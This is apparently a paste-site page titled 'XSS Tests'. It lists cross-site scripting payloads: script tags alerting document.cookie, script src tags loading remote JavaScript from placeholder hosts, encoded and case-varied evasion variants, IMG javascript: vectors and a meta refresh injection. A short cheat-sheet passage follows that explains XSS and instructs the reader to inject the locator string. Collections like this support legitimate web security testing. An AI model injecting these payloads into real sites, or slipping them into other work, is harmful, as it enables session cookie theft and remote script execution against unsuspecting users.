XSS Tests


Plain Text


Total Size: 2.5 KB



Created: 6 years ago


Edited: 6 years ago

article.php?title=<meta%20http-equiv="refresh"%20content="0;"> http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script>alert(document.cookie);</script> <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e \x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e '';!--"<XSS>=&{()} <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.



XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:


1 bit


Are you sure you want to delete?